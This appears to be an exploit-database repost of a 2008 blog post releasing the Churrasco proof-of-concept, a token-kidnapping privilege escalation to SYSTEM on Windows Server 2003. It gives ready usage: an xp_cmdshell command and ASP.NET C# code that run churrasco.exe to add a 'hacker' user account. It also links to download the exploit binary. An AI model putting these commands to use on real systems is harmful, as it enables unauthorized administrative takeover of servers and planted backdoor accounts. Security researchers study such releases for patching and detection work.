38 lines
No EOL
1.5 KiB
Text
38 lines
No EOL
1.5 KiB
Text
(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)
|
|
|
|
It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
|
|
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.
|
|
|
|
Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows
|
|
services accounts can impersonate. Other process (not services) that can impersonate are IIS 6 worker processes
|
|
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide
|
|
shared hosting services then I would recomend to not allow users to run this kind of code from ASP.
|
|
|
|
|
|
-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
|
|
|
|
exec xp_cmdshell 'churrasco "net user /add hacker"'
|
|
|
|
|
|
-Exploiting IIS 6 with ASP .NET :
|
|
...
|
|
System.Diagnostics.Process myP = new System.Diagnostics.Process();
|
|
myP.StartInfo.RedirectStandardOutput = true;
|
|
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
|
|
myP.StartInfo.UseShellExecute = false;
|
|
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
|
|
myP.Start();
|
|
string output = myP.StandardOutput.ReadToEnd();
|
|
Response.Write(output);
|
|
...
|
|
|
|
|
|
You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip
|
|
|
|
backup link: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6705.zip (2008-Churrasco.zip)
|
|
|
|
Enjoy.
|
|
|
|
Cesar.
|
|
|
|
# milw0rm.com [2008-10-08] |